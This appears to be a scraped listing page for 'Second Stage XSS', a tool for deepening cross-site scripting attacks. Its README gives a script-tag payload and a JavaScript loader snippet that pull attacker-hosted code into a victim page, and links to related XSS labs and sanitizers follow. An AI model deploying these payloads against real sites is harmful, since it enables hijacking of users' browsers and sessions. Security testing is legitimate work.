Second Stage XSS

Dimaz Arno

Last update: Jul 23, 2022

Related tags

Miscellaneous SSX

Overview

SSX

Second Stage XSS, This tool will help you to exploit XSS more deeply.

Installation:

Clone this project
This app need permission to write on current directory, for creating and update log
Change base URL in file en.js with your server address, example

var base_url = "https://yourweb/ssx/ping.php";

How to use:

Send payload XSS and pointing to your server, such as: <script src=//yourserver/en.js></script>

You can integrate with xss hunter or EzXSS by adding a secondary payload as follows:

var js = document.createElement("script");
js.type = "text/javascript";
js.src = "https://yourserver/en.js";
document.body.appendChild(js);

More info: https://dimazarno.medium.com/second-stage-xss-ssx-cd42d6e519c5

Please don't install it on a production server, and use it wisely, I am not responsible if there is damage / loss using this tool !!

Happy hunting!

You might also like...

A simple place to learn XSS

XSSPlayground A simple place to learn XSS. Made for myself to learn and to help others (please do use!) Disclaimer This is a works in progress and wil

23 Jun 21, 2022

XSS, CSRF, SQLi, RFI attacks/defences in eClass site.

Open eClass 2.3 Disclaimer This repository contained a vulnerable version of eclass (check very first commit for initial version, if you want to exper

10 Feb 14, 2022

Test a method against a list of XSS known.

php-xss-tests Test a method against a list of XSS known. How to run Just execute "run.sh", it will start a docker container to do all stuff. How I kno

1 Oct 25, 2021

HTML sanitizer, written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values.

TYPO3 HTML Sanitizer ℹ️ Common safe HTML tags & attributes as given in \TYPO3\HtmlSanitizer\Builder\CommonBuilder still might be adjusted, extended or

22 Dec 14, 2022

This website for web pentesters and beginner bug bounty hunters,You can improve your hacking skills by practicing xss in this lab.

XSSLab [Not finished yet, it's under development] XSSLab is a vulnerable website coded By Mahdi Jaber "Mr MJT" {in digital world}.. By XSSLab you can

7 Aug 30, 2022

Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campbell/security-core

Laravel Security Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campb

170 Nov 20, 2022

A wrapper of voku/anti-xss for Laravel

Laravel Security Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campb

170 Nov 20, 2022

HTML sanitizer, written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values.

TYPO3 HTML Sanitizer ℹ️ Common safe HTML tags & attributes as given in \TYPO3\HtmlSanitizer\Builder\CommonBuilder still might be adjusted, extended or

18 Jul 18, 2022

FilterGuard is a simple PHP library for sanitizing data. It provides methods to sanitize strings, integers, floats, booleans, arrays, and objects. The library helps protect against common security vulnerabilities such as XSS and SQL injection.

FilterGuard FilterGuard is a simple PHP library for data sanitization. It provides methods to sanitize strings, integers, floats, boolean values, arra

6 Jun 11, 2023

Owner

Dimaz Arno

GitHub

X1 - A very simple web based note solution that's designed to serve as my second brain.

X1 A very simple web based note solution that's designed to serve as my second brain. Starting Server To start the tool simply clone the repo and then

118 Dec 28, 2022

Compares two directories and removes the duplicate files from the second directory.

How does the HRZ Duplicate Refiner work? 1- Compares two directories : patternDir: the directory used as the pattern & does not change. victimDir: A d

2 May 6, 2022

A simple place to learn XSS

XSSPlayground A simple place to learn XSS. Made for myself to learn and to help others (please do use!) Disclaimer This is a works in progress and wil

23 Jun 21, 2022

This website for web pentesters and beginner bug bounty hunters,You can improve your hacking skills by practicing xss in this lab.

XSSLab [Not finished yet, it's under development] XSSLab is a vulnerable website coded By Mahdi Jaber "Mr MJT" {in digital world}.. By XSSLab you can

7 Aug 30, 2022

FilterGuard is a simple PHP library for sanitizing data. It provides methods to sanitize strings, integers, floats, booleans, arrays, and objects. The library helps protect against common security vulnerabilities such as XSS and SQL injection.

FilterGuard FilterGuard is a simple PHP library for data sanitization. It provides methods to sanitize strings, integers, floats, boolean values, arra

6 Jun 11, 2023

Sri Lanka Grade Exam Results Bot 📚 can collect Grade 5 O/L A/L Exam Results 📚 in Second Powerd By Sri lanka Department Of Examination 🚀

Sri-Lanka-Exam-Results-Telegram-Bot How to use the bot /start : Start Sri Lanka Grade 5 O/L A/L Exam Results Bot. /help : More information about Sri L

8 Oct 2, 2022

Second Stage XSS

Related tags

Overview

SSX

You might also like...

A simple place to learn XSS

XSS, CSRF, SQLi, RFI attacks/defences in eClass site.

Test a method against a list of XSS known.

HTML sanitizer, written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values.

This website for web pentesters and beginner bug bounty hunters,You can improve your hacking skills by practicing xss in this lab.

Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campbell/security-core

A wrapper of voku/anti-xss for Laravel

HTML sanitizer, written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values.

FilterGuard is a simple PHP library for sanitizing data. It provides methods to sanitize strings, integers, floats, booleans, arrays, and objects. The library helps protect against common security vulnerabilities such as XSS and SQL injection.

Owner

Dimaz Arno

X1 - A very simple web based note solution that's designed to serve as my second brain.

Compares two directories and removes the duplicate files from the second directory.

A simple place to learn XSS

This website for web pentesters and beginner bug bounty hunters,You can improve your hacking skills by practicing xss in this lab.

FilterGuard is a simple PHP library for sanitizing data. It provides methods to sanitize strings, integers, floats, booleans, arrays, and objects. The library helps protect against common security vulnerabilities such as XSS and SQL injection.

Sri Lanka Grade Exam Results Bot 📚 can collect Grade 5 O/L A/L Exam Results 📚 in Second Powerd By Sri lanka Department Of Examination 🚀

X1 - A very simple web based note solution that's designed to serve as my second brain.

Compares two directories and removes the duplicate files from the second directory.

㊙️ AntiXSS | Protection against Cross-site scripting (XSS) via PHP

PHP Template Attribute Language — template engine for XSS-proof well-formed XHTML and HTML5 pages